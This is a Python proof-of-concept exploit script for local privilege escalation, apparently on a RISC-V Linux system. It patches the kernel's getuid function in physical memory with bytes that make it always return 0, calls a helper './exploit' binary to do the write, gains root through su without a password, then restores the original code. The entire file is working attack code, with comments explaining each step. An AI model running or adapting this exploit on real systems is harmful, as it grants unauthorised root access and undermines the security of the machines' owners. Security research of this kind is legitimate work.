exploit.py

import os

try:
    import phys_data
except:
    print("please run physhelper.py first")

# (start of) original code of get_uid function.
# We assume this is known.
# However, it is only required to easily reset sys_getuid to its original state.
GETUID_ORIG = phys_data.get_uid_code

# code to write to get_uid function such that it always returns 0 (root).
"""
   0:	00000513          	li	a0,0
   4:	8082                ret
"""
GETUID_PATCH =  b'\x13\x05\x00\x00\x82\x80'

# remove old files
os.system("rm -f getuid_orig.bin")
os.system("rm -f getuid_patch.bin")

# create files containing binary blob of original get_uid code and patched code.
# We need the original code to patch the code back to its original, so not everything is suddenly root.
open("getuid_orig.bin", "wb").write(GETUID_ORIG)
open("getuid_patch.bin", "wb").write(GETUID_PATCH)

# We assume an attacker knows the physical address of getuid.
# The physical address layout stays the same even across reboots.
# Thus, an attacker just needs the same system they are targeting and can determine the target address from that.
PHYS_ADDRESS = phys_data.get_uid_addr


# The actual exploit.

# su requires a password when executed as non-root user.
# This first promt will require a password
os.system("su")

# Now we patch getuid by writing directly to its physical memory.
os.system(f"./exploit 0x{PHYS_ADDRESS:x} getuid_patch.bin")

# Now su no longer needs a password as it assumes it is executed by the root user (as getuid returns 0 -> root).
os.system("su")

# Once the attacker is done with being root, they can patch getuid back to its original state.
os.system(f"./exploit 0x{PHYS_ADDRESS:x} getuid_orig.bin")

# Now, a password is required again.
os.system("su")